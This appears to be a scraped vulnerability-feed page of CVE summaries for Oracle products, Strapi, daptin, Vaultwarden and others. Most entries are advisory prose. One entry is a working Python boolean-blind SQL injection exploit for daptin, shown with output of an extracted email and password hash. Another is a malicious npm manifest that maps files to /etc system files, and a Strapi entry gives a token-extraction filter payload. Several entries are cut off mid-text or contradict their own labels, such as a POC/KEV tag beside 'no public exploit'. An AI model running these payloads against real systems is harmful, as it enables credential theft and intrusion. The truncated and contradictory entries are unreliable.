Information disclosure in nezha 2.x server monitoring dashboard exposes private services marked with `EnableShowInService: false` to unauthenticated network visitors through two API endpoints that bypass the intended visibility filter. Attackers who can reach the API can enumerate hidden service names, IDs, and per-server timing data by iterating over public server IDs or guessing numeric service IDs - both low-cardinality spaces in typical deployments. No public exploit is required to leverage this; a fully functional proof-of-concept using only standard `curl` commands is documented in the GitHub security advisory GHSA-vrmh-5mmx-hjwx, and the fix is available in version 2.0.14.

Information Disclosure Oracle Microsoft +1
NVD GitHub
EPSS 0% CVSS 6.5
MEDIUM This Month

Information disclosure in Espressif ESP-IDF 5.5.4 and 6.0 allows local code in the Rich Execution Environment (REE) to leak TEE-protected memory by passing crafted pointer arguments to ESP-TEE secure-service wrappers. Because TEE hardware peripherals (ECC, SHA, SPI) run in RISC-V M-mode with full address-space access, attackers can coerce them to read from TEE-exclusive memory and return raw bytes, computed functions, or single-bit oracles enabling incremental disclosure of sensitive material. No public exploit identified at time of analysis; vendor-released patches exist in 5.5.5 and 6.0.1.

Information Disclosure Oracle
NVD GitHub VulDB
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

Decryption oracle exposure in Spring Security's SAML module allows unauthenticated remote attackers (PR:N, AV:N per CVSS) to submit crafted SAML Responses, LogoutRequests, and LogoutResponses to a Service Provider endpoint and leverage the SP's private key for decryption without presenting a valid XML signature. Affected deployments span Spring Security 5.7.x through 7.0.x that use SAML-based SSO or Single Logout. No public exploit has been identified at time of analysis and EPSS data was not provided, but the attack class (XML encryption oracle) is well-documented in SAML security research and carries meaningful risk in identity-sensitive environments.

Information Disclosure Oracle Jwt Attack +2
NVD VulDB HeroDevs
EPSS 0% CVSS 8.7
HIGH PATCH This Week

SQL injection in LimeSurvey's RemoteControl API (invite_participants and remind_participants methods) allows an authenticated attacker with tokens/update permission on a survey to execute arbitrary stacked SQL queries against the application database. Because PDO emulated prepared statements are enabled and MySQL multi-statements are not disabled, attackers can read administrator bcrypt hashes via time-based blind techniques or directly overwrite credentials for instant account takeover. No public exploit identified at time of analysis; the upstream fix is published as LimeSurvey PR #5031, which replaces unsafe string concatenation with parameterized addInCondition().

Oracle SQLi
NVD GitHub VulDB
EPSS 0% CVSS 8.2
HIGH This Week

Server-side request forgery in FUXA SCADA/HMI server (npm package fuxa-server <= 1.1.14-1243) allows unauthenticated remote attackers to connect to the Socket.IO endpoint and coerce the server to issue arbitrary HTTP(S), OPC UA, or ODBC requests with response bodies echoed back to the caller. No public exploit identified at time of analysis, but the GitHub Security Advisory GHSA-w86f-rf9w-h3x6 provides full handler-level reproduction details and the fix is shipped in release v1.3.2.

Oracle SSRF
NVD GitHub
EPSS 0% CVSS 7.1
HIGH PATCH This Week

Sandbox policy bypass in Twig templating engine versions 3.25.0 and earlier allows sandboxed template authors to invoke arbitrary `__toString()` methods on any `Stringable` object reachable in the render context, even when those methods are not allowlisted by `SecurityPolicy::checkMethodAllowed()`. The flaw stems from `SandboxNodeVisitor` only wrapping a hardcoded subset of AST nodes in `CheckToStringNode`, leaving many string-coercion points (conditional expressions, comparison/`matches` operators, tests, ranges, includes, spread arguments) unguarded - and the comparison-operator vector enables byte-by-byte oracle recovery of sensitive object string forms. No public exploit identified at time of analysis; fix shipped in Twig 3.26.0 (also referenced by Symfony's advisory page).

PHP Authentication Bypass Oracle
NVD GitHub
EPSS 0% CVSS 6.9
MEDIUM PATCH This Month

Timing oracle in NocoDB's shared-view password authentication allows a network-positioned attacker to recover legacy plaintext passwords character-by-character through response time measurement. Affected installations are those where shared-view passwords were set before the bcrypt migration - passwords stored as bcrypt hashes (prefixed $2a$/$2b$) were never vulnerable. The strict-equality (===) JavaScript comparison leaked both password length and per-character prefix timing, enabling incremental brute-force without any prior authentication. No public exploit has been identified at time of analysis, and the vulnerability is not listed in CISA KEV.

Information Disclosure Oracle
NVD GitHub
EPSS 0% CVSS 3.1
LOW PATCH Monitor

Heap out-of-bounds read in 7-Zip versions 9.11 through 26.00 exposes up to 3 bytes of heap memory during UDF disc image parsing, triggering when a user opens or extracts a crafted .iso or .udf file. Impact is constrained to a 1-bit information-disclosure oracle per out-of-bounds byte (inferred from open/fail behavior) and potential denial of service under hardened allocators; no write primitive exists. No public exploit code or CISA KEV listing has been identified at time of analysis, and the CVSS Low score of 3.1 accurately reflects the limited real-world severity.

Denial Of Service Information Disclosure Oracle +1
NVD GitHub VulDB
EPSS 0% CVSS 6.3
MEDIUM PATCH This Month

DNS transaction ID entropy collapse in AdGuard Home (≤v0.107.74) and its underlying dnsproxy library (≤v0.81.2) reduces the backend UDP forwarding tuple from two random variables to one: the DNS ID is deterministically 0 on every client-triggered DoQ-to-UDP hop, leaving only the UDP source port as the sole remaining entropy variable. An off-path attacker who can inject spoofed ICMP error messages toward the resolver's egress address can exploit a reliable source-port oracle - confirmed across four consecutive runs for both products - to identify the correct backend socket state before injecting a forged DNS response, placing this attack in the same threat-model class as SAD DNS and TUdoor. No public exploit confirmed at time of analysis beyond the working oracle reproducer included in the advisory disclosure; the advisory is not listed in CISA KEV.

OpenSSL Race Condition Oracle +2
NVD GitHub
EPSS 0% CVSS 6.3
MEDIUM PATCH This Month

Password reset token enumeration in FOSSBilling prior to 0.8.0 exposes three authentication endpoints - including the elevated-privilege admin reset at `/staff/email/:hash` - to unlimited brute-force guessing due to a rate limiter architecturally scoped exclusively to `/api/*` routes. The confirmation endpoint acts as a CWE-204 oracle, returning distinguishable HTTP responses (200 for valid tokens, 302 redirect for invalid), allowing an unauthenticated remote attacker to probe token validity without throttling, lockout, or attempt counting. Practical exploitation risk is substantially reduced by 256-bit token entropy (`hash('sha256', random_bytes(32))`) combined with a 15-minute expiry window, which is accurately reflected in the CVSS 4.0 AC:H/AT:P scoring; no public exploit or CISA KEV listing has been identified at time of analysis.

Information Disclosure Oracle Apache +2
NVD GitHub
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

Out-of-bounds read in liboqs prior to 0.16.0 affects the XMSS and XMSS^MT stateful signature verification routines, exploitable by any unauthenticated remote attacker who can supply a crafted public key to a verifying process. The flaw arises when a correctly-sized signature buffer is paired with a public key whose OID bytes reference a different XMSS parameter set, causing the library to derive a larger sig_bytes value and index past the end of the caller-supplied buffer, with the primary observable effect being a process crash. No active exploitation is confirmed (not in CISA KEV) and no independently published exploit has been identified at time of analysis, though a proof-of-concept scenario is embedded in the upstream fix commit's test suite.

Denial Of Service Information Disclosure Oracle +3
NVD GitHub
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

Out-of-bounds read in liboqs prior to 0.16.0 allows a remote unauthenticated attacker to crash the verifying process by supplying a truncated signature buffer to the XMSS or XMSS^MT stateful signature verification function. The missing caller-supplied length validation causes the implementation to read past the end of the buffer; the overread bytes feed into an internal hash computation only and are not returned to the caller, eliminating any data-leakage oracle. The primary real-world impact is a denial-of-service crash if the overread crosses an unmapped memory page. No public exploit or CISA KEV listing is identified at time of analysis.

Denial Of Service Oracle Buffer Overflow +2
NVD GitHub
EPSS 0% CVSS 5.3
MEDIUM This Month

Partial denial-of-service in Oracle REST Data Services (ORDS) versions 24.2.0 through 26.1.0 allows unauthenticated remote attackers to degrade availability of the Core component via HTTPS. The CVSS vector (AV:N/AC:L/PR:N/UI:N) confirms the vulnerability is trivially reachable with no authentication, no user interaction, and no special conditions, making automated scanning and opportunistic exploitation straightforward despite the limited availability-only impact. No public exploit code and no CISA KEV listing have been identified at time of analysis, and Oracle disclosed this through its May 2026 Critical Patch Update.

Denial Of Service Oracle
NVD VulDB
EPSS 0% CVSS 5.3
MEDIUM This Month

Unauthenticated network-based data integrity compromise in Oracle REST Data Services (ORDS) versions 24.2.0 through 26.1.0 allows remote attackers to perform unauthorized insert, update, or delete operations against accessible ORDS data via HTTPS. The vulnerability resides in the Core component and is classified as an Authentication Bypass, meaning the access control enforcement in ORDS's request pipeline can be circumvented without credentials. No public exploit code or active exploitation (CISA KEV) has been identified at time of analysis, though the CVSS vector (AV:N/AC:L/PR:N/UI:N) indicates the exploit path is straightforward for any network-adjacent attacker.

Authentication Bypass Oracle
NVD VulDB
EPSS 0% CVSS 5.3
MEDIUM This Month

Unauthorized read access in Oracle REST Data Services (ORDS) versions 24.2.0 through 26.1.0 allows unauthenticated remote attackers to bypass authentication controls via HTTPS and retrieve a subset of accessible data. The CVSS vector (AV:N/AC:L/PR:N/UI:N) confirms no special conditions are needed - any network-reachable instance is potentially exploitable without credentials. No public exploit code or CISA KEV listing has been identified at time of analysis, and EPSS data was not available in the provided intelligence, limiting exploitation urgency assessment.

Oracle Information Disclosure
NVD VulDB
EPSS 0% CVSS 10.0
CRITICAL Act Now

Remote takeover of Oracle REST Data Services (ORDS) versions 24.2.0 through 26.1.0 allows unauthenticated attackers to compromise the service over HTTPS and pivot into adjacent products due to a scope-changing flaw. With a maximum CVSS 10.0 score and trivial exploitability (AV:N/AC:L/PR:N/UI:N), this Backend-as-a-Service component vulnerability poses critical risk, though no public exploit identified at time of analysis and no EPSS or CISA KEV signal has been provided in the available data.

Oracle Authentication Bypass
NVD VulDB
EPSS 0% CVSS 9.9
CRITICAL Act Now

Privilege escalation to full takeover in Oracle REST Data Services (ORDS) versions 24.2.0 through 26.1.0 allows a low-privileged remote attacker over HTTPS to fully compromise the service and pivot into adjacent products via a CVSS scope change. CVSS 3.1 base score is 9.9 with attack complexity rated low, and no public exploit identified at time of analysis. The scope-change designation is the key differentiator - successful exploitation extends beyond ORDS itself into systems it fronts, most notably the backing Oracle Database.

Oracle Authentication Bypass
NVD VulDB
EPSS 0% CVSS 8.8
HIGH This Week

Full product takeover of Oracle Flow Manufacturing (versions 12.2.9 through 12.2.15) is achievable by a low-privileged remote attacker via SQL-based network access, per Oracle's advisory. The flaw scores CVSS 8.8 with high impact across confidentiality, integrity, and availability, and no public exploit has been identified at time of analysis. As a component of Oracle E-Business Suite, exploitation provides an attacker with control over a business-critical manufacturing execution system.

Oracle Privilege Escalation
NVD VulDB
EPSS 0% CVSS 7.5
HIGH This Week

Remote denial of service in Oracle Database Server 23.4.0 through 23.26.2 allows unauthenticated network attackers to crash or hang the Net Service component via crafted TLS traffic. The flaw scores CVSS 7.5 with availability-only impact and was disclosed by Oracle in the May 2026 Critical Patch Update; no public exploit identified at time of analysis.

Denial Of Service Oracle
NVD VulDB
EPSS 0% CVSS 7.5
HIGH This Week

Remote denial-of-service in Oracle Database Server's Net Service component (versions 23.4.0 through 23.26.2) allows unauthenticated attackers with TLS network access to hang or repeatedly crash the listener, producing a complete DoS of database connectivity. The flaw is rated CVSS 7.5 (availability-only) and was disclosed by Oracle in the May 2026 Critical Patch Update; no public exploit identified at time of analysis and the issue is not currently listed in CISA KEV.

Denial Of Service Oracle
NVD VulDB
EPSS 0% CVSS 9.0
CRITICAL Act Now

Net Service takeover in Oracle Database Server 23.4.0 through 23.26.2 allows unauthenticated remote attackers reaching the TLS-protected Net Service listener to fully compromise confidentiality, integrity, and availability, with scope change indicating impact on adjacent components. CVSS 9.0 reflects high impact tempered by high attack complexity (AC:H), and no public exploit identified at time of analysis. Reported and tracked in Oracle's May 2026 Critical Patch Update advisory.

Information Disclosure Oracle
NVD VulDB
EPSS 0% CVSS 5.3
MEDIUM This Month

Unauthorized read access in Oracle REST Data Services (ORDS) versions 24.2.0 through 26.1.0 is achievable by unauthenticated remote attackers via the Mongoapi component over HTTPS. The vulnerability is tagged as an Authentication Bypass, indicating the Mongoapi endpoint fails to enforce access controls, exposing a subset of data accessible through that interface. No public exploit code and no CISA KEV listing exist at time of analysis, but the CVSS vector (AV:N/AC:L/PR:N/UI:N) confirms low-complexity, zero-authentication exploitation is feasible at scale.

Oracle Information Disclosure
NVD VulDB
EPSS 0% CVSS 7.5
HIGH This Week

Remote denial-of-service in Oracle REST Data Services (ORDS) versions 24.2.0 through 26.1.0 allows unauthenticated network attackers to cause a complete hang or repeatable crash of the service via the Mongoapi component over HTTPS. The vulnerability is rated CVSS 7.5 with availability-only impact and no public exploit identified at time of analysis, but the unauthenticated, low-complexity attack profile makes it operationally significant for any internet-exposed ORDS instance.

Denial Of Service Oracle
NVD
EPSS 0% CVSS 8.1
HIGH This Week

Unauthorized data access and modification in Oracle Payroll (a module of Oracle E-Business Suite) versions 12.2.3 through 12.2.15 allows a low-privileged authenticated attacker with HTTP network access to read, create, delete, or modify any data accessible to the Oracle Payroll application. The flaw carries a CVSS 8.1 due to high confidentiality and integrity impact with low attack complexity, but no public exploit identified at time of analysis and it is not listed in CISA KEV. The advisory was published as part of Oracle's Critical Patch Update cycle (CPU May 2026).

Authentication Bypass Oracle
NVD
EPSS 0% CVSS 8.8
HIGH This Week

Account takeover in Oracle Payroll (Self Service Manager component) of Oracle E-Business Suite versions 12.2.3 through 12.2.15 allows a low-privileged authenticated attacker to fully compromise the Payroll module over HTTP. The CVSS 3.1 base score of 8.8 reflects high impacts to confidentiality, integrity, and availability, and Oracle has issued a fix in the May 2026 Critical Patch Update. No public exploit identified at time of analysis.

Oracle Privilege Escalation
NVD VulDB
EPSS 0% CVSS 8.8
HIGH This Week

Account takeover in Oracle Payroll (component: Internal Operations) within Oracle E-Business Suite versions 12.2.3 through 12.2.15 allows a low-privileged remote attacker with HTTPS network access to fully compromise the Payroll application. The CVSS 8.8 vector indicates low complexity and no user interaction, meaning any authenticated EBS user can pivot to full confidentiality, integrity, and availability impact on Payroll. No public exploit identified at time of analysis, but the issue was disclosed in Oracle's Critical Patch Update advisory and warrants prompt patching given the sensitivity of payroll data.

Oracle Authentication Bypass
NVD VulDB
EPSS 0% CVSS 9.9
CRITICAL Act Now

Account takeover in Oracle Universal Work Queue (component: Work Provider Site Level Administration) within Oracle E-Business Suite versions 12.2.3 through 12.2.15 allows low-privileged remote attackers over HTTP to fully compromise the product with confidentiality, integrity, and availability impact. The CVSS 9.9 score reflects a scope-changing flaw whose blast radius extends to other Oracle E-Business Suite products beyond Universal Work Queue itself. No public exploit identified at time of analysis, but the low attack complexity and minimal privilege requirement make this a high-priority Oracle Critical Patch Update item.

Oracle Privilege Escalation
NVD VulDB
EPSS 0% CVSS 7.7
HIGH This Week

Unauthorized data access in Oracle Public Sector Financials (International), a module of Oracle E-Business Suite versions 12.2.6 through 12.2.15, allows low-privileged remote attackers to read sensitive data across module boundaries due to a flaw in the Authorization component. The scope-changed CVSS 7.7 vector indicates exploitation can affect resources beyond the vulnerable component itself, expanding the blast radius to other EBS data. No public exploit identified at time of analysis, and the issue is not listed in CISA KEV.

Authentication Bypass Oracle
NVD
EPSS 0% CVSS 9.9
CRITICAL Act Now

Account takeover in Oracle iAssets (part of Oracle E-Business Suite versions 12.2.3 through 12.2.15) allows a low-privileged attacker with HTTP network access to fully compromise the iAssets component and pivot into adjacent products via a scope change. The 9.9 CVSS score reflects high impact on confidentiality, integrity, and availability combined with low attack complexity; no public exploit identified at time of analysis, but Oracle's inclusion in the May 2026 Critical Patch Update warrants immediate attention.

Oracle Authentication Bypass
NVD VulDB
EPSS 0% CVSS 7.7
HIGH This Week

Unauthorized data access in Oracle E-Business Suite's Financials Common Modules (versions 12.2.3 through 12.2.15) allows low-privileged remote attackers to read sensitive data via HTTP, with a scope change that extends impact beyond the vulnerable component to other Oracle products. The flaw carries a CVSS 3.1 base score of 7.7 reflecting high confidentiality impact, but no public exploit has been identified at time of analysis and the issue is not currently listed in CISA KEV.

Authentication Bypass Oracle
NVD
EPSS 0% CVSS 8.5
HIGH This Week

Cross-product data exposure in Oracle Financials Common Modules (E-Business Suite versions 12.2.3 through 12.2.15) allows a low-privileged authenticated attacker to access or modify sensitive financial data over HTTP. The scope-changed nature of the flaw means exploitation impacts additional Oracle products beyond Financials Common Modules itself. No public exploit identified at time of analysis, and the issue is not currently listed in CISA KEV.

Authentication Bypass Oracle
NVD
EPSS 0% CVSS 9.1
CRITICAL Act Now

Remote unauthenticated compromise of Oracle Internet Procurement Connector (a component of Oracle E-Business Suite versions 12.2.3 through 12.2.15) allows attackers to read, modify, create, or delete all data accessible to the component over HTTP. The CVSS 9.1 score reflects high confidentiality and integrity impact with low attack complexity and no privileges or user interaction required. No public exploit identified at time of analysis, but the trivial exploitability profile combined with EBS's history of being targeted (e.g., CVE-2025 Cl0p campaigns) makes this a priority patch for any internet-exposed deployment.

Authentication Bypass Oracle
NVD
EPSS 0% CVSS 7.4
HIGH This Week

Unauthorized data modification and disclosure in Oracle E-Business Suite (Oracle Payments component, File Transmission) versions 12.2.3 through 12.2.15 allows unauthenticated remote attackers over HTTPS to read, alter, create, or delete all Oracle Payments-accessible data. The flaw carries a CVSS 3.1 base score of 7.4 with high confidentiality and integrity impact but no availability impact, and is rated high attack complexity. No public exploit identified at time of analysis, and it is not currently listed in CISA KEV.

Authentication Bypass Oracle
NVD VulDB
EPSS 0% 5.0 CVSS 9.8
CRITICAL POC KEV THREAT Emergency

Remote takeover of Oracle Payments in Oracle E-Business Suite versions 12.2.3 through 12.2.15 is possible via the File Transmission component, allowing unauthenticated network-based attackers to fully compromise confidentiality, integrity, and availability (CVSS 9.8). The flaw is described by Oracle as easily exploitable over HTTP with no user interaction, and no public exploit identified at time of analysis. Tagged as Information Disclosure and listed in Oracle's May 2026 Critical Patch Update advisory.

Oracle Privilege Escalation Oracle Payments
NVD VulDB
EPSS 0% CVSS 9.9
CRITICAL Act Now

Takeover of Oracle REST Data Services (ORDS) versions 24.2.0 through 26.1.0 is achievable by a low-privileged remote attacker over HTTPS, with scope-changed impact extending to additional Oracle products beyond ORDS itself. Oracle rates this 9.9 CVSS due to the combination of low attack complexity, minimal privilege requirement, and full confidentiality/integrity/availability compromise; no public exploit identified at time of analysis, but the easy exploitability noted in Oracle's advisory makes this a high-priority patch target.

Oracle Authentication Bypass
NVD VulDB
EPSS 0% CVSS 8.1
HIGH This Week

Unauthorized data access and modification in Oracle REST Data Services (ORDS) versions 24.2.0 through 26.1.0 allows low-privileged remote attackers to read, create, modify, or delete any data accessible via the service. The flaw is network-reachable over HTTPS with low attack complexity (CVSS 8.1) and was disclosed by Oracle in the May 2026 Critical Patch Update. No public exploit has been identified at time of analysis, and the vulnerability is not currently listed in CISA KEV.

Authentication Bypass Oracle
NVD VulDB
EPSS 0% CVSS 7.9
HIGH This Week

Cross-product compromise in Oracle REST Data Services (ORDS) versions 24.2.0 through 26.1.0 allows a low-privileged remote attacker who can lure an authenticated user into interacting with a crafted request to gain high-impact read and write access to ORDS-accessible data and cause partial denial of service. Because the CVSS scope is Changed (S:C), successful exploitation may also impact downstream Oracle components beyond ORDS itself. There is no public exploit identified at time of analysis and the issue is not listed in CISA KEV, but the 7.9 base score combined with scope change warrants prompt patching.

Authentication Bypass Denial Of Service Oracle +1
NVD
EPSS 0% CVSS 9.8
CRITICAL Act Now

Remote takeover of Oracle Hospitality OPERA 5 Property Services (versions 5.6.19.24, 5.6.22, 5.6.25.19, 5.6.27.6, and 5.6.28) is achievable by unauthenticated network attackers over HTTP, per Oracle's May 2026 CPU. With CVSS 9.8 and full CIA impact, this is a critical hospitality-sector exposure, though no public exploit is identified at time of analysis and KEV status is not present. EPSS data was not supplied, so probability-of-exploitation cannot be quantified.

Information Disclosure Oracle
NVD VulDB
EPSS 0% CVSS 7.8
HIGH This Week

Local privilege escalation via command injection in Raynet rvia (RayVentory) 12.6.4392.49-amd64.deb allows authenticated local users to achieve arbitrary code execution by exploiting an improperly terminated find query the application uses to locate the Java runtime. The flaw is reachable through the getconfig command, the upload URL argument, and the oracle -o flag, and publicly available exploit code exists on GitHub although no active exploitation has been observed.

Java Command Injection RCE +1
NVD GitHub
EPSS 0% CVSS 6.3
MEDIUM PATCH This Month

KVM read-only execution isolation bypass in klever-go allows a low-privileged smart contract actor to commit irreversible contract deletion side effects through the `ExecuteReadOnlyWithTypedArguments` hook, violating the expected non-mutating guarantee of read-only calls. Affected are all deployments of klever-go prior to v1.7.17 where smart contract workflows invoke callees through read-only execution paths. A confirmed proof-of-concept was included with the original disclosure, demonstrating that `DeletedAccounts` in VM output transitions from zero entries to one after a read-only nested call - no public exploit is separately circulating and CISA KEV listing is not confirmed at time of analysis.

Oracle Authentication Bypass
NVD GitHub
EPSS 0% CVSS 8.3
HIGH PATCH This Week

Sensitive credential disclosure in OpenMetadata 1.12.1 allows any authenticated non-admin SSO user to retrieve cleartext database passwords and a long-lived ingestion-bot JWT by triggering a TEST_CONNECTION workflow via POST /api/v1/automations/workflows. The HTTP 201 response unexpectedly echoes the stored Oracle/database secret and the bot's bearer token, which can then be replayed against service APIs with bot-level privileges. A detailed proof-of-concept is published in the GitHub Security Advisory (GHSA-9vmh-whc4-7phg), so publicly available exploit code exists; no public exploit identified at time of analysis in CISA KEV.

Microsoft Information Disclosure Apache +1
NVD GitHub VulDB
EPSS 0% CVSS 5.8
MEDIUM PATCH This Month

{id}/html-check`, making this a zero-credential pivot primitive into internal infrastructure. Publicly available exploit code exists; no confirmed active exploitation in CISA KEV at time of analysis.

Java Docker SSRF +2
NVD GitHub
EPSS 0% CVSS 9.2
CRITICAL PATCH Act Now

Boolean-oracle information disclosure in Strapi Content API allows remote unauthenticated attackers to extract admin password-reset tokens and achieve full administrative account takeover. Strapi versions 4.0.0 through 5.36.1 fail to sanitize relational query parameters on public content-type endpoints. By crafting `where` filters that traverse into joined `admin_users` table columns (e.g., `where[updatedBy][resetPasswordToken][$startsWith]=a`), attackers perform character-by-character oracle attacks against private admin fields, then use the extracted reset token to hijack administrator accounts. WildWest CyberSecurity reports this critical vulnerability with CVSS 9.3, affecting all Strapi deployments with public content-types containing admin-relation fields (`updatedBy`, `createdBy`, `publishedBy`). Vendor-released patch available in version 5.37.0. No active exploitation or public POC identified at time of analysis.

Oracle Path Traversal
NVD GitHub VulDB
EPSS 0% CVSS 7.5
HIGH PATCH This Week

{ "name": "chess-sec-utils1", "version": "1.0.6", "main": "index.js", "type": "module", "browser": { "./d1.txt": "../../../../../../../../etc/hostname", "./d2.json": "../../../../../../../../etc/os-release", "./d3.json": "../../../../../../../../etc/environment" } }

Debian Ubuntu Oracle +2
NVD GitHub
EPSS 0% CVSS 5.0
MEDIUM PATCH This Month

mosparo is the modern solution to protect your online forms from spam. Prior to 1.4.13, the automatic rule package source URL feature allows a project member with the editor role to store an attacker-controlled URL that the server later fetches. Because the server follows http/https redirects and does not restrict private or loopback destinations, this becomes a stored SSRF primitive that can be turned into an internal HTTP probing oracle. This vulnerability is fixed in 1.4.13.

SSRF Oracle
NVD GitHub
EPSS 0% CVSS 7.3
HIGH PATCH This Week

Vaultwarden is a Bitwarden-compatible server written in Rust. Prior to 1.35.4, there is a security vulnerability in Vaultwarden that allows bypassing the login brute-force protection if email 2fa is enabled. If email 2fa is enabled, the unprotected 2fa-function send_email_login (email.rs, api endpoint /api/two-factor/send-email-login) also acts as an oracle determining whether a username-password combination is correct. An attacker can abuse that endpoint to brute-force passwords without rate-limiting. This works even for users who don't have email 2fa configured. This vulnerability is fixed in 1.35.4.

Authentication Bypass Oracle
NVD GitHub VulDB
EPSS 0% CVSS 6.3
MEDIUM PATCH This Month

Server-side request forgery in MCP Registry's HTTP namespace verification endpoint allows unauthenticated attackers to reach internal IPv4 addresses via specially-crafted IPv6 addresses that encode or tunnel to RFC1918 and cloud-metadata services. The vulnerability exists in the private-address blocklist used by `safeDialContext`, which fails to block IPv6 6to4 (2002::/16), NAT64 well-known (64:ff9b::/96), NAT64 local-use (64:ff9b:1::/48), and deprecated site-local (fec0::/10) prefixes. On dual-stack and IPv6-only cloud deployments (GKE IPv6, AWS IPv6-only EC2, Azure NAT64), this enables direct connections to metadata services and internal Kubernetes API servers. No public exploit code identified at time of analysis, but proof-of-concept has been demonstrated against the production registry.

Kubernetes SSRF Microsoft +2
NVD GitHub VulDB
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

Host object identity crosses the vm2 sandbox boundary when Promise resolution delivers objects to sandbox callbacks, allowing sandboxed code to mutate host objects and perform identity checks via WeakMap. The vulnerability stems from Promise.prototype.then wrapping that uses ensureThis() for conversion instead of stronger cross-realm proxying; when no prototype mapping exists, ensureThis() returns the original host object unmodified. This sandbox escape affects vm2 versions up to 3.10.5 and is fixed in 3.11.0.

Oracle Information Disclosure Red Hat
NVD GitHub
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

Arbitrary PDF file read vulnerability in Gotenberg versions up to 8.31.0 allows unauthenticated remote attackers to extract PDF content via path traversal in stampExpression and watermarkExpression parameters on six conversion routes (pdfengines/merge, pdfengines/split, libreoffice/convert, chromium/convert/url, chromium/convert/html, chromium/convert/markdown). The vulnerability exists because these routes accept user-controlled file paths without validation when stamp or watermark source is set to PDF, unlike the dedicated stamp/watermark routes which enforce file upload requirements. An attacker can read any PDF accessible to the Gotenberg process by specifying its filesystem path, gaining access to potentially sensitive documents in containerized deployments or systems with mounted directories.

Microsoft Python Oracle +3
NVD GitHub VulDB
EPSS 0% CVSS 7.1
HIGH PATCH This Week

{"Content-Type": "application/json"}) try: return json.loads(urllib.request.urlopen(req, timeout=10).read(50_000)) except urllib.request.HTTPError as e: return json.loads(e.read(50_000)) def token(): post("/action/user_account/signup", {"attributes": { "name": "poc", "email": "poc@test.com", "password": "adminadmin", "passwordConfirm": "adminadmin"}}) body = post("/action/user_account/signin", {"attributes": { "email": "poc@test.com", "password": "adminadmin"}}) return next(i["Attributes"]["value"] for i in body if i.get("ResponseType") == "client.store.set") def rows(col, jwt): q = urllib.parse.urlencode({"query": json.dumps( [{"column": col, "operator": "fuzzy", "value": "zzzzz"}])}) req = urllib.request.Request(f"{BASE}/api/world?{q}&page%5Bsize%5D=5", headers={"Authorization": "Bearer " + jwt}) d = json.loads(urllib.request.urlopen(req, timeout=10).read(50_000)) return len(d.get("data", [])) def oracle(expr, jwt): col = f"reference_id) OR ({expr}) OR LOWER(world.reference_id" return rows(col, jwt) > 0 def extract_int(sql, jwt, hi=200): lo = 0 while lo < hi: mid = (lo + hi + 1) // 2 if oracle(f"({sql}) >= {mid}", jwt): lo = mid else: hi = mid - 1 return lo def extract_str(sql, jwt, maxlen=80): n = extract_int(f"LENGTH(({sql}))", jwt, hi=maxlen) s = "" for _ in range(n): lo, hi = 32, 126 while lo < hi: mid = (lo + hi) // 2 pfx = s.replace("'", "''") expr = f"({sql}) >= '{pfx}'||char({mid+1})" if s else f"({sql}) >= char({mid+1})" if oracle(expr, jwt): lo = mid + 1 else: hi = mid s += chr(lo) return s jwt = token() print("baseline :", rows("reference_id", jwt), "rows") print("tautology:", rows("reference_id) OR 1=1 OR LOWER(world.reference_id", jwt), "rows") jwt = token() print("sqlite_master table count:", extract_int("SELECT count(*) FROM sqlite_master WHERE type='table'", jwt, hi=80)) print("email (row 1):", extract_str("SELECT email FROM user_account ORDER BY id LIMIT 1", jwt)) pw_hex = extract_str("SELECT HEX(password) FROM user_account WHERE email='poc@test.com' LIMIT 1", jwt, maxlen=40) print("pw hash prefix:", bytes.fromhex(pw_hex).decode("ascii", errors="replace")) ``` **Output** (measured on commit `5d32142`, SQLite, macOS arm64): ``` baseline : 0 rows tautology: 5 rows sqlite_master table count: 57 email (row 1): guest@cms.go pw hash prefix: $2a$11$W7vO9oOPzpf7u ``` --- **Attacker precondition**: One valid JWT. Self-signup is enabled by default on a fresh daptin instance - no admin involvement required. **What is impacted**: The full database is readable via boolean-blind extraction, including all tables visible in `sqlite_master` and credential data (emails, bcrypt password hashes) in `user_account`. Extraction rate is approximately 7 HTTP requests per character, making full-database extraction feasible.

SQLi PostgreSQL Python +2
NVD GitHub
EPSS 0% CVSS 9.4
CRITICAL POC PATCH Act Now

SQL injection in Rucio's DID search API allows any authenticated user to execute arbitrary SQL on Oracle database backends, enabling complete database compromise. The vulnerability affects Rucio versions 1.27.0 through 40.1.0 when deployed with Oracle databases using the default json_meta plugin. Attackers can extract authentication tokens, password hashes (SHA-256 single-iteration, GPU-crackable), storage credentials, and all managed data. Data modification and potential remote code execution via Oracle PL/SQL features are possible. Vendor-confirmed vulnerability with patches released across four version branches. PostgreSQL and MySQL deployments are not affected due to proper SQLAlchemy parameterization on those database dialects.

SQLi PostgreSQL Java +3
NVD GitHub
EPSS 0% CVSS 6.6
MEDIUM This Month

Malicious environment variable injection in Oracle Cloud Native Environment Command Line Interface v2.3.2 allows local authenticated users with low privileges to execute arbitrary code through user interaction, compromising systems running the affected CLI tool. The vulnerability requires local access and user action but results in high-impact code execution with full confidentiality and integrity compromise.

Oracle RCE Code Injection
NVD
EPSS 0% CVSS 6.1
MEDIUM PATCH This Month

Oracle OCI CLI version 3.77 allows local attackers with user interaction to place imported files outside the intended directory, compromising file integrity and enabling potential code execution or data exfiltration. The vulnerability requires local access and user interaction but carries high integrity impact through arbitrary file placement. No active exploitation or public exploit code has been identified at the time of analysis.

Oracle Path Traversal Suse
NVD VulDB
EPSS 0% CVSS 5.1
MEDIUM This Month

Zabbix Agent 2 allows remote attackers with high privileges to inject malicious Oracle TNS connection strings via the 'service' parameter, enabling credential theft from saved database sessions. The vulnerability requires network access and high-level privileges but can lead to disclosure of Oracle database credentials if they are stored in named sessions. CVSS 5.1 reflects the requirement for authenticated attacker access (PR:H), though the impact to stored credentials is significant.

Oracle Information Disclosure
NVD VulDB
EPSS 0% CVSS 4.7
MEDIUM This Month

Oracle Macaron Tool v0.22.0 fails to properly validate host addresses in HTTP requests, allowing unauthenticated remote attackers to cause information disclosure through crafted network traffic. The vulnerability requires user interaction (UI:R) and affects the confidentiality of the tool's host validation mechanism. No active exploitation has been publicly confirmed.

Open Redirect Oracle
NVD VulDB
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

